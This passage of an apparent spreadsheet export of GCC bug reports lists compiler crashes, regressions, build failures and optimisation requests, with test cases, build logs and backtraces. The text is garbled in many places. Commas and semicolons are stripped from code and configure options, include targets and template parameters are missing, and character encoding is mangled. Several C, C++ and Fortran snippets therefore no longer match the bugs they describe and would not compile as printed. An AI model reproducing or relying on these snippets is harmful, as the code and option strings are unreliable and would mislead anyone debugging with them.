 &gt;     In standard C/C++  such concatenation does not happen.  It appears it was an undocumented feature of some previous versions of GCC.
 &gt; 
 &gt;     If you really miss it you can probably get what you want through the # operator via indirect macro expansion.
 &gt; 
 &gt; http://gcc.gnu.org/cgi-bin/gnatsweb.pl?cmd=view%20audit-trail&amp;database=gcc&amp;pr=9650
</t>
  </si>
  <si>
    <t>waid</t>
  </si>
  <si>
    <t>GCC-15414</t>
  </si>
  <si>
    <t>Failure in compiling very huge C program</t>
  </si>
  <si>
    <t>Dear sirs
I am working with Politecnico of Milano on a project for ESA.
I have a problem and I hope you can kindly suggest me a way to solve it.
I got a failure in compiling a very big C source code automatically generated 
by a tool for dynamic multi body simulation.
The source file is 21 MB and the preprocessed file is about 14 Mb in size.
The output of the compiler is the following:
cc1: Cannot allocate 4228939388 bytes after allocating 14476768 bytes
 /usr/lib/gcc-lib/i486-slackware-linux/3.2.3/cpp0 -lang-c -v -I. -
I/root/dymola/source -D__GNUC__
I am working on an Intel work station with:
PIV 3Ghz
1 GB RAM
Linux operting system - slackware 9.1
Gcc version 3.2.3
The command line I used for the compilation is the following:
gcc -v -save-temps -o dymosim -O -DDYMOSIM -DUNIX -DSkip_f2c_UNDEFS -I. -
I/root/dymola/source 
dsmodel.c /root/dymola/source/dymosim.c /root/dymola/bin/libds.a /root/dymola/bi
n/librtai.a -lm -lcomedi &gt;logs.txt 2&gt;&amp;1
and the following is the output of the command:
Reading specs from /usr/lib/gcc-lib/i486-slackware-linux/3.2.3/specs
Configured with: ../gcc-3.2.3/configure --prefix=/usr --enable-shared --enable-
threads=posix --enable-__cxa_atexit --disable-checking --with-gnu-ld --verbose -
-target=i486-slackware-linux --host=i486-slackware-linux
Thread model: posix
gcc version 3.2.3
 /usr/lib/gcc-lib/i486-slackware-linux/3.2.3/cpp0 -lang-c -v -I. -
I/root/dymola/source -D__GNUC__=3 -D__GNUC_MINOR__=2 -D__GNUC_PATCHLEVEL__=3 -
D__GXX_ABI_VERSION=102 -D__ELF__ -Dunix -D__gnu_linux__ -Dlinux -D__ELF__ -
D__unix__ -D__gnu_linux__ -D__linux__ -D__unix -D__linux -Asystem=posix -
D__OPTIMIZE__ -D__STDC_HOSTED__=1 -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -
D__i386__ -D__tune_i486__ -DDYMOSIM -DUNIX -DSkip_f2c_UNDEFS dsmodel.c dsmodel.i
GNU CPP version 3.2.3 (cpplib) (i386 Linux/ELF)
ignoring nonexistent directory /usr/i486-slackware-linux/include
#include ... search starts here:
#include  search starts here:
 .
 /root/dymola/source
 /usr/local/include
 /usr/lib/gcc-lib/i486-slackware-linux/3.2.3/include
 /usr/include
End of search list.
 /usr/lib/gcc-lib/i486-slackware-linux/3.2.3/cc1 -fpreprocessed dsmodel.i -
quiet -dumpbase dsmodel.c -O -version -o dsmodel.s
GNU CPP version 3.2.3 (cpplib) (i386 Linux/ELF)
GNU C version 3.2.3 (i486-slackware-linux)
	compiled by GNU C version 3.2.3.
In file included from /root/dymola/source/matrixop.h:36
                 from dsmodel.c:11:
/root/dymola/source/dsutil.h:486: warning: static declaration for `remainder' 
follows non-static
cc1: Cannot allocate 4228939388 bytes after allocating 14476768 bytes
 /usr/lib/gcc-lib/i486-slackware-linux/3.2.3/cpp0 -lang-c -v -I. -
I/root/dymola/source -D__GNUC__=3 -D__GNUC_MINOR__=2 -D__GNUC_PATCHLEVEL__=3 -
D__GXX_ABI_VERSION=102 -D__ELF__ -Dunix -D__gnu_linux__ -Dlinux -D__ELF__ -
D__unix__ -D__gnu_linux__ -D__linux__ -D__unix -D__linux -Asystem=posix -
D__OPTIMIZE__ -D__STDC_HOSTED__=1 -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -
D__i386__ -D__tune_i486__ -DDYMOSIM -DUNIX -
DSkip_f2c_UNDEFS /root/dymola/source/dymosim.c dymosim.i
GNU CPP version 3.2.3 (cpplib) (i386 Linux/ELF)
ignoring nonexistent directory /usr/i486-slackware-linux/include
#include ... search starts here:
#include  search starts here:
 .
 /root/dymola/source
 /usr/local/include
 /usr/lib/gcc-lib/i486-slackware-linux/3.2.3/include
 /usr/include
End of search list.
 /usr/lib/gcc-lib/i486-slackware-linux/3.2.3/cc1 -fpreprocessed dymosim.i -
quiet -dumpbase dymosim.c -O -version -o dymosim.s
GNU CPP version 3.2.3 (cpplib) (i386 Linux/ELF)
GNU C version 3.2.3 (i486-slackware-linux)
	compiled by GNU C version 3.2.3.
 /usr/lib/gcc-lib/i486-slackware-linux/3.2.3/../../../../i486-slackware-
linux/bin/as -V -Qy -o dymosim.o dymosim.s
GNU assembler version 2.14.90.0.6 (i486-slackware-linux) using BFD version 
2.14.90.0.6 20030820
I have the preprocessed file but how can I sent it to you?
Please can you suggest me how can I get my source code compiled?
Thank you in advance for your help.
Gianpaolo Rizzi
gprizzi@tin.it</t>
  </si>
  <si>
    <t>gprizzi</t>
  </si>
  <si>
    <t>GCC-34148</t>
  </si>
  <si>
    <t>[4.3 Regression] Too many VOPs too deep tree-ssa-sccvn.c recursion</t>
  </si>
  <si>
    <t>With the fix for PR33870 we now create _loads_ of VOPs for QTs qmake makefile.cpp
at even -O so that all machines I have either run OOM or with a debug build of
gcc tree-ssa-sccvn.c:1853 (DFS visiting VUSEs) recurses too deeply and blows
the 8MB stack on x86_64 (and takes too much compile-time).
Which means we no longer can build QT.</t>
  </si>
  <si>
    <t>GCC-57373</t>
  </si>
  <si>
    <t>ICE on invalid: insert_bbt(): Duplicate key found!</t>
  </si>
  <si>
    <t>Created attachment 30165
Minimal test case
The following invalid code (with a number instead of an identifier for the function argument) produces an internal error:
&gt; cat minimal.f90
  interface foo
    function A(0) result(r)
    function A(0) result(r)
  end interface
&gt; 
&gt; ~/sys/bin/gfortran minimal.f90
minimal.f90:2.15:
    function A(0) result(r)
               1
Error: Expected formal argument list in function definition at (1)
minimal.f90:3.14:
    function A(0) result(r)
              1
Internal Error at (1):
insert_bbt(): Duplicate key found!
&gt; ~/sys/bin/gfortran --version
GNU Fortran (GCC) 4.9.0 20130517 (experimental)
Copyright (C) 2013 Free Software Foundation Inc.
GNU Fortran comes with NO WARRANTY to the extent permitted by law.
You may redistribute copies of GNU Fortran
under the terms of the GNU General Public License.
For more information about these matters see the file named COPYING
&gt;
Here ~/sys/bin/gfortran is self-compiled however it happens already with verion 4.7.2 that is supplied with openSUSE 12.3.</t>
  </si>
  <si>
    <t>GCC-44891</t>
  </si>
  <si>
    <t>[4.6 Regression] non-trivial conversion ICE from early SRA</t>
  </si>
  <si>
    <t>jh@evans:/abuild/jh/mozilla-central/build8/ipc/ipdl&gt; /abuild/jh/trunk-install/bin/g++ ~/PTestDataStructuresParent.ii -O2 -r -fwhopr -nostdlib
In file included from :244:0:
PTestDataStructuresParent.cpp: In member function â€˜Readâ€™:
PTestDataStructuresParent.cpp:1810:1: error: non-trivial conversion at assignment
const ProcessHandle
# .MEM_303 = VDEF 
MEM[(struct BarAttrs *)D.21979_35 + 20B].dummy_ = SR.1200_250(D)
PTestDataStructuresParent.cpp:1810:1: internal compiler error: verify_stmts failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-59297</t>
  </si>
  <si>
    <t>[4.7 Regression] ICE: openmp atomic with indirect LHS</t>
  </si>
  <si>
    <t>Created attachment 31292
Preprocessed source
This code outputs the following ICE (and nothing else):
atIce.cpp: In function â€˜void f(Y&amp;)â€™:
atIce.cpp:15:20: internal compiler error: in lower_stmt at gimple-low.c:457
   data (pts[0]) += 1
                    ^
when compiled with 
g++ -o /dev/null -c -Wfatal-errors -fopenmp -fpermissive -w -std=gnu++0x atIce.cpp
gcc -v:
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/libexec/gcc/x86_64-pc-linux-gnu/4.8.2/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /var/tmp/paludis/build/sys-devel-gcc-4.8.2/work/gcc-4.8.2/configure --prefix=/usr --host=x86_64-pc-linux-gnu --build=x86_64-pc-linux-gnu --mandir=/usr/share/man --infodir=/usr/share/info --datadir=/usr/share --sysconfdir=/etc --localstatedir=/var/lib --disable-silent-rules --enable-fast-install --libdir=/usr/lib64 --cache-file=config.cache --libdir=/usr/lib64 --with-pkgversion='exherbo gcc-4.8.2' --program-suffix=-4.8 --disable-bootstrap --enable-clocale=gnu --enable-languages=cc++fortranjava --enable-lto --disable-multilib --enable-nls --enable-serial-configure --enable-libquadmath --enable-libquadmath-support --with-cloog --enable-libgomp --disable-libobjc --disable-libssp --with-as=x86_64-pc-linux-gnu-as --with-ld=x86_64-pc-linux-gnu-ld --with-system-zlib
Thread model: posix
gcc version 4.8.2 (exherbo gcc-4.8.2)</t>
  </si>
  <si>
    <t>chaosgate</t>
  </si>
  <si>
    <t>GCC-28812</t>
  </si>
  <si>
    <t>RTL aliasing vs may_alias and structs</t>
  </si>
  <si>
    <t>The following testcase should work with -fstrict-aliasing -O2 but does not:
struct S { short x }
typedef struct S __attribute__((__may_alias__)) test
test *p
int g(int *a)
{
 p = (test*)a
}
int f()
{
  int a
  g(
  a = 10
  test s={1}
  *p=s
  return a
}
int main() {
  if (f() == 10)
    __builtin_abort()
  return 0
}</t>
  </si>
  <si>
    <t>GCC-72742</t>
  </si>
  <si>
    <t>[7 Regression] ICE in extract_insn at recog.c:2309 (error: unrecognizable insn) w/ -Os -mlra</t>
  </si>
  <si>
    <t>gcc-7.0.0-alpha20160724 snapshot ICEs when compiling the following reduced snippet for 32-bit BE powerpc w/ -Os -mlra:
int xi m3
unsigned short int a8
void
p6 (int ey unsigned short int *sa)
{
  int fx
 reh5ef9u:
    {
      unsigned short int va
      if (ey != 0)
        {
          a8 %= xi &lt; 0
          while (a8 &lt; 17)
            ++a8
          m3 
          if ((xi &amp; (m3 != 0 ? *sa : 0)) != 0)
            {
              va /= 3
              xi += (va != 0) ? (va = xi) : 0
            }
          xi = va 
          goto reh5ef9u
          sa = 
        }
    }
}
% powerpc-e300c3-linux-gnu-gcc-7.0.0-alpha20160724 -c -Os -mlra uwysfky3.c
uwysfky3.c: In function 'p6':
uwysfky3.c:27:1: error: unrecognizable insn:
 }
 ^
(insn 165 53 166 9 (set (reg:SI 10 10 [211])
        (and:SI (reg:SI 9 9 [orig:161 xi_lsm.20 ] [161])
            (const_int 0 [0]))) uwysfky3.c:17 -1
     (nil))
uwysfky3.c:27:1: internal compiler error: in extract_insn at recog.c:2309
(unrecognizable insn dump for powerpc-e500v2-linux-gnuspe is very similar).</t>
  </si>
  <si>
    <t>GCC-8449</t>
  </si>
  <si>
    <t>Ellipsis in 3...5 not recognized properly</t>
  </si>
  <si>
    <t>Compiling this:
int a[2] = {[0 ...1]=1}
with gcc -c t.c gives an error:
gcc -c t9.c
t9.c:1: too many decimal points in floating constant
The cause is quite obious: The ellipsis is parsed as part of the
number. Something along these lines might fix it (only compile tested
as of yet)
--- cpplex.c.old	Mon Nov  4 17:15:08 2002
+++ cpplex.c	Mon Nov  4 17:14:45 2002
@@ -5276 +5277 @@
 {
   cpp_buffer *buffer = pfile-&gt;buffer
   unsigned char *dest *limit
+  int dotdot = 0
   dest = BUFF_FRONT (pfile-&gt;u_buff)
   limit = BUFF_LIMIT (pfile-&gt;u_buff)
@@ -5476 +54811 @@
     {
       do
 	{
+	  /* Is this potentially an ellipsis? */
+	  if (c == '.' &amp;&amp; *(buffer-&gt;cur+1) == '.') {
+	    dotdot = 1
+	    break
+	  }
 	  /* Need room for terminating null.  */
 	  if ((size_t) (limit - dest) &lt; 2)
 	    {
@@ -5636 +5698 @@
       /* Potential escaped newline?  */
       buffer-&gt;backup_to = buffer-&gt;cur - 1
+      if (dotdot)
+        break
       if (c != '?' &amp;&amp; c != '\\')
 	break
       c = skip_escaped_newlines (pfile)
Release:
gcc-3.2
Environment:
Reading specs from /usr/local/bin/../lib/gcc-lib/sparc-sun-solaris2.9/3.2/specs
Configured with: /export/local/manager/playground/ULMgcc32/src/gcc-3.2/configure --with-ld=/usr/local/bin/ld --with-gnu-ld --with-as=/usr/local/bin/as --with-gnu-as --prefix=/usr/local/
Thread model: posix
gcc version 3.2
SunOS perseus 5.9 Generic_112233-01 sun4u sparc SUNWUltra-5_10
How-To-Repeat:
See above.</t>
  </si>
  <si>
    <t>GCC-41240</t>
  </si>
  <si>
    <t>[4.5 regression] ICE: in get_attr_got at config/mips/mips.md:455 building stage1 N64 libgcc</t>
  </si>
  <si>
    <t>As of 20090903 (rev. 151371) mainline fails to bootstrap while building the N64
stage1 libgcc on IRIX 6.5:
vol/gcc/src/gcc-dist/libgcc/../gcc/libgcc2.c: In function '__lshrti3':
/vol/gcc/src/gcc-dist/libgcc/../gcc/libgcc2.c:431:1: error: unrecognizable insn:
(debug_insn 14 13 15 3 /vol/gcc/src/gcc-dist/libgcc/../gcc/libgcc2.c:414 (var_location:DI bm (reg/v:DI 3 $3 [orig:193 bm ] [193])) -1 (nil))
/vol/gcc/src/gcc-dist/libgcc/../gcc/libgcc2.c:431:1: internal compiler error: in get_attr_got at config/mips/mips.md:455
This worked fine yesterday (20090902 rev. 151332).</t>
  </si>
  <si>
    <t>GCC-44505</t>
  </si>
  <si>
    <t>[4.6 Regression] gcc.c-torture/execute/frame-address.c</t>
  </si>
  <si>
    <t>On Linux/ia32 revision 160623 gave:
FAIL: gcc.c-torture/execute/frame-address.c execution  -O2 
FAIL: gcc.c-torture/execute/frame-address.c execution  -O3 -g 
FAIL: gcc.c-torture/execute/frame-address.c execution  -Os 
FAIL: gcc.c-torture/execute/frame-address.c execution  -O2 -flto 
FAIL: gcc.c-torture/execute/frame-address.c execution  -O2 -fwhopr 
Revision 160612 is OK.</t>
  </si>
  <si>
    <t>GCC-66803</t>
  </si>
  <si>
    <t>std::this_thread::sleep_for gets interrupted by signals.</t>
  </si>
  <si>
    <t>Created attachment 35930
preprocessed source
#include 
#include 
#include 
#include 
void signal_handler(int) {}
int main()
{
    using namespace std::chrono_literals
    std::signal(SIGUSR1 signal_handler)
    const auto start = std::chrono::high_resolution_clock::now()
    std::this_thread::sleep_for(5s)
    const auto end = std::chrono::high_resolution_clock::now()
    std::cout (end-start).count() &lt;&lt;  s\n
    return 0
}
Compilation command: g++-5.1 -save-temps -std=c++14 test_cpp.cpp -o test_cpp -O2 -Wall -Wextra -pedantic -pthread
Preprocessed source in attachment.
Testing command line: ./test_cpp &amp; sleep 2 &amp;&amp; kill -USR1 $!
Expected result: std::this_thread::sleep_for(5s) sleeps for 5 seconds.
Actual result: std::this_thread::sleep_for(5s) sleeps for 2 seconds.
The behavior of std::this_thread::sleep_for seems similar to sleep from unistd.h - it gets interrupted by signal handler. But std::this_thread::sleep_for unlike sleep has no way to report if it was interrupted or time left to sleep. C++14 standard (N3797) in 30.3.2 says that sleep_for should sleep specified amount of time and nothing about any interrupts. 
The same source compiled with clang++ -std=c++14 -stdlib=libc++ -lc++abi test_cpp.cpp -o test_cpp -O2 (with clang version 3.5.0) behaves as expected.
$ g++-5.1 -v
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/usr/local/libexec/gcc/x86_64-unknown-linux-gnu/5.1.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: /usr/src/gcc/configure --disable-multilib --enable-languages=cc++
Thread model: posix
gcc version 5.1.0 (GCC)</t>
  </si>
  <si>
    <t>GCC-31258</t>
  </si>
  <si>
    <t>segfault with transpose(reshape(char))</t>
  </si>
  <si>
    <t>In trying to reduce PR 31197 I stumbled across a segfault:
$ cat bar.f90
CHARACTER(LEN=3) DIMENSION(10) :: Z
CHARACTER(LEN=10) :: res
Z(:)=123
write(*'(10A1)') TRANSPOSE(RESHAPE(Z(:)(2:2)(/52/)))
END
...
(gdb) r bar.f90
Starting program: /home/ig25/libexec/gcc/i686-pc-linux-gnu/4.3.0/f951 bar.f90
Failed to read a valid object file image from memory.
 MAIN__
Program received signal SIGSEGV Segmentation fault.
0x080ccca3 in gfc_conv_function_call (se=0xbf8680e0 sym=0x880f9e8
    arg=0x8849650 append_args=0x0)
    at /home/ig25/gcc/trunk/gcc/fortran/trans-expr.c:2032
2032      need_interface_mapping = ((sym-&gt;ts.type == BT_CHARACTER
(gdb) bt
#0  0x080ccca3 in gfc_conv_function_call (se=0xbf8680e0 sym=0x880f9e8
    arg=0x8849650 append_args=0x0)
    at /home/ig25/gcc/trunk/gcc/fortran/trans-expr.c:2032
#1  0x080d7edb in gfc_conv_intrinsic_funcall (se=0xbf8680e0 expr=0x8849c78)
    at /home/ig25/gcc/trunk/gcc/fortran/trans-intrinsic.c:1514
#2  0x080cd407 in gfc_conv_function_expr (se=0xbf8680e0 expr=0x880f9e8)
    at /home/ig25/gcc/trunk/gcc/fortran/trans-expr.c:2657
#3  0x080cdb89 in gfc_conv_expr (se=0xbf8680e0 expr=0x8849c78)
    at /home/ig25/gcc/trunk/gcc/fortran/trans-expr.c:3097
#4  0x080b9ebd in gfc_add_loop_ss_code (loop=0xbf8681ec ss=0x880f900
    subscript=0 '\0') at /home/ig25/gcc/trunk/gcc/fortran/trans-array.c:1803
#5  0x080ba766 in gfc_conv_loop_setup (loop=0xbf8681ec)
    at /home/ig25/gcc/trunk/gcc/fortran/trans-array.c:3232
#6  0x080db6fc in gfc_trans_transfer (code=0x884a2f0)
    at /home/ig25/gcc/trunk/gcc/fortran/trans-io.c:1850
#7  0x080b17a9 in gfc_trans_code (code=0x884a2f0)
    at /home/ig25/gcc/trunk/gcc/fortran/trans.c:605
#8  0x080ddc04 in build_dt (function=0xb7bba310 code=0x884a3b0)
    at /home/ig25/gcc/trunk/gcc/fortran/trans-io.c:1507
#9  0x080b17cb in gfc_trans_code (code=0x884a3b0)
    at /home/ig25/gcc/trunk/gcc/fortran/trans.c:581
#10 0x080c75e3 in gfc_generate_function_code (ns=0x8848d50)
    at /home/ig25/gcc/trunk/gcc/fortran/trans-decl.c:3217
...</t>
  </si>
  <si>
    <t>GCC-48902</t>
  </si>
  <si>
    <t>var-tracking.c fails to compile for PCC_STATIC_STRUCT_RETURN</t>
  </si>
  <si>
    <t>gcc -c   -g -O2 -DIN_GCC -DCROSS_DIRECTORY_STRUCTURE  -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Werror -Wold-style-definition -Wc++-compat -fno-common  -DHAVE_CONFIG_H -I. -I. -I../../../gcc/gcc -I../../../gcc/gcc/. -I../../../gcc/gcc/../include -I../../../gcc/gcc/../libcpp/include -I/opt/cfarm/mpc/include  -I../../../gcc/gcc/../libdecnumber -I../../../gcc/gcc/../libdecnumber/dpd -I../libdecnumber    ../../../gcc/gcc/var-tracking.c -o var-tracking.o
../../../gcc/gcc/var-tracking.c: In function â€˜prepare_call_argumentsâ€™:
../../../gcc/gcc/var-tracking.c:5650:8: error: â€˜elseâ€™ without a previous â€˜ifâ€™
make[2]: *** [var-tracking.o] Error 1</t>
  </si>
  <si>
    <t>GCC-8286</t>
  </si>
  <si>
    <t>[x86] Missing xmmintrin.h functions</t>
  </si>
  <si>
    <t>The following functions and macros are missing from xmmintrin.h as compared
to Intel C++ xmmintrin.h and emmintrin.h headers:
_MM_ALIGN16
_mm_add_si64
_mm_cmplt_epi16
_mm_cmplt_epi32
_mm_cmplt_epi8
_mm_cvt_pi2ps
_mm_cvt_ps2pi
_mm_cvt_si2ss
_mm_cvt_ss2si
_mm_cvtsi128_si32
_mm_cvtsi32_si128
_mm_cvtt_ps2pi
_mm_cvtt_ss2si
_mm_load_si128
_mm_loadl_epi64
_mm_loadu_si128
_mm_move_epi64
_mm_movepi64_pi64
_mm_mul_epu32
_mm_mul_su32
_mm_set1_epi16
_mm_set1_epi32
_mm_set1_epi64
_mm_set1_epi8
_mm_set_epi16
_mm_set_epi32
_mm_set_epi64
_mm_set_epi8
_mm_setr_epi16
_mm_setr_epi32
_mm_setr_epi64
_mm_setr_epi8
_mm_setzero_si128
_mm_store_si128
_mm_storel_epi64
_mm_storeu_si128
_mm_sub_si64
_mm_unpackhi_epi64
_mm_unpacklo_epi64
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-59539</t>
  </si>
  <si>
    <t>Missed optimisation: VEX-prefixed operations don't need aligned data</t>
  </si>
  <si>
    <t>Consider the following code:
#include 
int f(void *p1 void *p2)
{
    __m128i d1 = _mm_loadu_si128((__m128i*)p1)
    __m128i d2 = _mm_loadu_si128((__m128i*)p2)
    __m128i result = _mm_cmpeq_epi16(d1 d2)
    return _mm_movemask_epi8(result)
}
If compiled with -O2 -mavx it produces the following code with GCC 4.9 (current trunk):
f:
        vmovdqu (%rdi) %xmm0
        vmovdqu (%rsi) %xmm1
        vpcmpeqw        %xmm1 %xmm0 %xmm0
        vpmovmskb       %xmm0 %eax
        ret
One of the two VMOVDQU are unnecessary since the VEX-prefixed VCMPEQW instruction can do unaligned loads without faulting. The Intel Software Developer's Manual Volume 1 Chapter 14 says in 14.9 Memory alignment:
&gt; With the exception of explicitly aligned 16 or 32 byte SIMD load/store instructions most VEX-encoded
&gt; arithmetic and data processing instructions operate in a flexible environment regarding memory address
&gt; alignment i.e. VEX-encoded instruction with 32-byte or 16-byte load semantics will support unaligned load
&gt; operation by default. Memory arguments for most instructions with VEX prefix operate normally without
&gt; causing #GP(0) on any byte-granularity alignment (unlike Legacy SSE instructions). The instructions that
&gt; require explicit memory alignment requirements are listed in Table 14-22.
Clang and ICC have already implemente this optimisation:
Clang 3.3 produces:
f:                                      # @f
        vmovdqu (%rsi) %xmm0
        vpcmpeqw        (%rdi) %xmm0 %xmm0
        vpmovmskb       %xmm0 %eax
        ret
Similarly ICC 14 produces:
f:
        vmovdqu   (%rdi) %xmm0
        vpcmpeqw  (%rsi) %xmm0 %xmm1
        vpmovmskb %xmm1 %eax
        ret</t>
  </si>
  <si>
    <t>GCC-3483</t>
  </si>
  <si>
    <t>gcc 3.0 will not compile on Solaris 2.6 with tradcif.o error</t>
  </si>
  <si>
    <t>When creating a directory to configure gcc 3.0 after running the make
the make eventually dies and gives:
(cd intl &amp;&amp; make all)
(cd po &amp;&amp; make all)
gcc  -DIN_GCC -DSVR4   -g -O2 -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wtraditional -pedantic -Wno-long-long  -DHAVE_CONFIG_H  -o tradcpp0 \
tradcpp.o tradcif.o mkdeps.o cppdefault.o version.o intl.o obstack.o alloca.o        ../libiberty/libiberty.a
gcc: tradcif.o: No such file or directory
*** Error code 1
make: Fatal error: Command failed for target `tradcpp0'
Current working directory /home/mickyw/tools/gccbuild/gcc
Release:
unknown
Environment:
Solaris 2.6</t>
  </si>
  <si>
    <t>micky.williamson</t>
  </si>
  <si>
    <t>GCC-20753</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression] ACATS ce3810b segfaults at runtime</t>
  </si>
  <si>
    <t>4.1.0 20050404 (experimental) (hppa-unknown-linux-gnu)
.. CE3810B ACATS 2.5 05-04-04 04:57:28
---- CE3810B CHECK THAT FIXED_IO PUT CAN OPERATE ON STRINGS.  ALSO CHECK
                THAT LAYOUT_ERROR IS RAISED WHEN THE STRING IS
                INSUFFICIENTLY LONG.
Segmentation fault      (core dumped)</t>
  </si>
  <si>
    <t>GCC-15382</t>
  </si>
  <si>
    <t>frontend too lenient when checking variable declarations</t>
  </si>
  <si>
    <t>The following should issue an error in the frontend:
SUBROUTINE BARY()
COMMON /A/ X
EQUIVALENCE (XY)
REAL :: Y = 1.
DATA X /1./
PRINT * X Y
END
currently it fails with a fatal error in the backend:
[tobi@marktplatz tests]$ gfortran com.f90
com.f90: In function `bary':
com.f90:16: fatal error: gfc_todo: Not Implemented: initial values for COMMON or
EQUIVALENCE
compilation terminated.
[tobi@marktplatz tests]$</t>
  </si>
  <si>
    <t>GCC-55687</t>
  </si>
  <si>
    <t>[4.8 Regression] ICE in hide_evolution_in_other_loops_than_loop at tree-chrec.c:716</t>
  </si>
  <si>
    <t>Created attachment 28953
preprocessed source
/usr/lib/gcc/i586-suse-linux/4.8/cc1 -fpreprocessed splashy_functions.i -quiet -dumpbase splashy_functions.c -mtune=generic -march=i586 -auxbase-strip splashy-splashy_functions.o -g -O2 -Wall -Werror -version -fomit-frame-pointer -fmessage-length=0 -fstack-protector -funwind-tables -fasynchronous-unwind-tables -o splashy_functions.s
GNU C (SUSE Linux) version 4.8.0 20121212 [trunk revision 194442] (i586-suse-linux)
        compiled by GNU C version 4.8.0 20121212 [trunk revision 194442] GMP version 5.0.5 MPFR version 3.1.1 MPC version 1.0
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
GNU C (SUSE Linux) version 4.8.0 20121212 [trunk revision 194442] (i586-suse-linux)
        compiled by GNU C version 4.8.0 20121212 [trunk revision 194442] GMP version 5.0.5 MPFR version 3.1.1 MPC version 1.0
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: e68fcd130690afd931631ae80bbb1d1f
splashy_functions.c: In function 'verbose_text_loop':
splashy_functions.c:1392:1: internal compiler error: in hide_evolution_in_other_loops_than_loop at tree-chrec.c:716
 }</t>
  </si>
  <si>
    <t>GCC-9512</t>
  </si>
  <si>
    <t>[3.4 regression] Segmentation fault if qualifying name of template explicit specialisation in namespace</t>
  </si>
  <si>
    <t>If in a namespace an explicit specialisation of a class template is defined and the name of the primary template is qualified with the namespace name the compiler stops with a segmentation fault.
This affects at least a gcc 3.4 snapshot from 2003-01-29
A gcc 3.2.2 snapshot of 2002-11-29 compiles the same code.
Release:
3.4 20030129 (experimental)
Environment:
System: Linux thunderbird 2.4.20 #1 Sat Jan 11 12:08:38 CET 2003 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ./configure --prefix=/usr/local/gcc_newparser --enable-threads --disable-libgcj --enable-languages=cc++ --disable-nls
How-To-Repeat:
compiling the attached code with gcc 3.4 20030129</t>
  </si>
  <si>
    <t>GCC-13012</t>
  </si>
  <si>
    <t>gnatlink cannot set switches for compilation of binder file</t>
  </si>
  <si>
    <t>gnatlink essentially compiles the binder file and then calls the system linker.
Gnatlink has no option to set the compiler options that are to be used when 
compiling the binder file.  This is true at least for a C binder file in the 
Ada case I haven't verified.  At least --RTS= is not not transmitted to the Ada 
compiler.  Some targets require -m options this cannot be specified neither.</t>
  </si>
  <si>
    <t>rolf.ebert_spam_</t>
  </si>
  <si>
    <t>GCC-33506</t>
  </si>
  <si>
    <t>[4.2 Regression] TYPE_RAISES_EXCEPTIONS dumped with attributes</t>
  </si>
  <si>
    <t>extern int foo (char *) __attribute__ ((warn_unused_result))
extern int bar (char *) throw () __attribute__ ((warn_unused_result))
extern int bar (char *) throw ()
fails to compile with 4.2/4.3 (instead of warn_unused_result
any other attribute that has type_required set can be used like nonnull
regparm ...).  The problem is that attribs will modify the type
using build_type_attribute_variant which being a middle-end rather than FE
function doesn't know about TYPE_RAISES_EXCEPTIONS.</t>
  </si>
  <si>
    <t>GCC-68177</t>
  </si>
  <si>
    <t>Lambda capture doesn't work correctly when lambda is used in a pack expansion</t>
  </si>
  <si>
    <t>Repro:
void swallow(...) {}
template
void foo() {
  int t = 0
  swallow(
   ([}() Is)...
  )
}
int main()
{
  foo()
  return 0
}
gcc HEAD 6.0.0 20151031 (experimental) reports:
prog.cc: In instantiation of 'void foo() [with int ...Is = 1 2]':
prog.cc:13:13:   required from here
prog.cc:6:5: error: member 'foo() [with int ...Is = 1 2]::::' is uninitialized reference
    ([}() Is)...
     ^
It appears that only the capture in the first element in the pack expansion gets initialized correctly.
Clang accepts this code as does MSVC.</t>
  </si>
  <si>
    <t>GCC-29189</t>
  </si>
  <si>
    <t>Error during CPP build of Mozilla</t>
  </si>
  <si>
    <t>Bug on Mozilla side for Reference
https://bugzilla.mozilla.org/show_bug.cgi?id=342472
When trying to build any mozllia program with GCC 4.0 and greater build fails
c++ -save-temps -I/usr/X11R7/include -fno-rtti -fno-exceptions -Wall -Wconversion -Wpointer-arith -Wcast-align -Woverloaded-virtual -Wsynth -Wno-ctor-dtor-privacy -Wno-non-virtual-dtor -Wno-long-long -pedantic -mcpu=G3 -mtune=G3 -fshort-wchar -pthread -pipe  -DNDEBUG -DTRIMMED -mcpu=G3 -mtune=G3 -fno-strict-aliasing -O1 -fPIC -shared -Wl-h -Wllibxpcom_compat.so -o libxpcom_compat.so  nsFileSpec.o nsFileStream.o nsIFileStream.o nsFileSpecImpl.o nsSpecialSystemDirectory.o       -Wl--whole-archive ../../dist/lib/libmozreg_s.a  -Wl--no-whole-archive  -L../../dist/bin -lxpcom -lxpcom_core  -L../../dist/bin -L/usr/lib -lplds4 -lplc4 -lnspr4 -lpthread -ldl -ldl -lm
c++: warning: -pipe ignored because -save-temps specified
nsSpecialSystemDirectory.o: In function `nsSpecialSystemDirectory::Set(nsSpecialSystemDirectory::SystemDirectories nsFileSpec*)':
nsSpecialSystemDirectory.cpp:(.text+0x1d0): undefined reference to `nsHashtable::nsHashtable(unsigned int int)'
nsSpecialSystemDirectory.cpp:(.text+0x204): undefined reference to `nsHashtable::Put(nsHashKey* void*)'
nsSpecialSystemDirectory.cpp:(.text+0x214): undefined reference to `nsHashKey::~nsHashKey()'
nsSpecialSystemDirectory.o: In function `nsSpecialSystemDirectory::operator=(nsSpecialSystemDirectory::SystemDirectories)':
nsSpecialSystemDirectory.cpp:(.text+0x3d0): undefined reference to `nsHashtable::Get(nsHashKey*)'
nsSpecialSystemDirectory.cpp:(.text+0x3fc): undefined reference to `nsHashtable::Get(nsHashKey*)'
